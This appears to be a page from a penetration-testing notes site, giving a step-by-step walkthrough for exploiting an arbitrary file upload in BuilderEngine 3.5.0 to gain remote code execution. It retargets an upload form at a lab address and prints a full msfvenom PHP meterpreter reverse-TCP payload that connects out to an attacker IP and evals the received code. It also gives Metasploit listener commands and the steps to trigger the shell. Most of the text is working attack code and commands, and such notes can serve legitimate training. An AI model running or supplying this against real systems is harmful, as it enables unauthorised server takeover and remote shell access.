BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0

#BuilderEngine 3.5.0 - Arbitrary File Upload

searchsploit -m php/webapps/40390.php

-->
<html>
<body>
<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" en>
        <input type="file" name="files[]" />
        <input type="submit" value="send" />
</form>
</body>
</html>


#Change the above with the target uri


-->
<html>
<body>
<form method="post" action="http://192.168.101.190/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" en>
        <input type="file" name="files[]" />
        <input type="submit" value="send" />
</form>
</body>
</html>

[1]Save the file as test.html

[2]Create a payload with msfvenom (simple php-reverse-shell is also possible)

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.12.128 lport=4444 -f raw  

#output:

<?php /**/ error_reporting(0); $ip = '192.168.12.128'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

[3]Copy the payload and paste it in a shell.php file

[4]Start a meterpreter listener to catch the shell

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.12.128  
set lport 4444    
run

[5]Right click on the test.html and open with firefox

[6]select the “shell.php” file previously created

[7]Shell is now available at http://192.168.101.190/files/ | click on newly created payload to trigger revshell

Previousrobots.txt NextSquid proxy

Last updated 3 years ago